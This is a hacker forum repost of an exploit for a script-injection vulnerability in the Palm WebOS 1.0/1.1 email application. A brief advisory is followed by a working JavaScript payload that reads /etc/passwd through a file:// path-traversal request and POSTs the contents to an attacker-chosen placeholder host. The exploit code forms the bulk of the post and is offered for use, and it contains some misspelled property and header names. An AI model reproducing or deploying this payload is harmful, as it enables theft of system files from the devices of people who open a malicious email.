跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection

精选回复

发布于
source: https://www.securityfocus.com/bid/36592/info

Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary script code. Successful exploits can compromise the application.

Versions prior to WebOS 1.2 are vulnerable.

<script>
var getdata = null;
get = new XMLHttpRequest();

get.open(&#039;GET&#039;, "file://../../../../../../../../../etc/passwd");
get.send("");
get.onreadystatechange = function() {
    if (get.readyState == 4) {
	getdata = get.responseText;
	POST(getdata);
    }
}

function POST (egg) {
    post = new XMLHttpRequest();
    var strResult;
    //Edit WEBSITE_OF_CHOICE for Grabber
    post.open(&#039;POST&#039;, "WEBSITE_OF_CHOICE",false);
    post.setRequestHeader(&#039;Conetnt-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
    post.send(egg);
    get.send("");
    post = null;
    strResult = objHTTP.tesponseTetxt;
}
</script>
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。